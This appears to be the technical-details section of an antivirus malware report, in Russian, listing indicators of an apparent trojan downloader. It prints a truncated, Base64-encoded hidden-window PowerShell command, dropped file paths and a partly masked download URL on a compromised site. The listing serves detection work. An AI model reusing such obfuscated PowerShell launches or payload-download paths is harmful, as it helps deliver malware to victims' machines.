Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASABnAHUAaABpAHIAZABqAGoAZgBoACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFIAeAByAGoAaAB4AHYAcwBsAGUAawBiAGwAIAAjAD4AIAAkAFIAcgBuAGsAcwB6AHQAcAB4AG4APQ...
- %HOMEPATH%\928.exe
- %PROGRAMDATA%\dxcsdyjgbn.dfxcsd
- http://www.ww##d.com/wp-admin/ho3/
- DNS ASK ww##d.com
- '%HOMEPATH%\928.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAASABnAHUAaABpAHIAZABqAGoAZgBoACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFIAeAByAGoAaAB4AHYAcwBsAGUAawBiAGwAIAAjAD4AIAAkAFIAcgBuAGsAcwB6AHQAcAB4AG4APQ...' (со скрытым окном)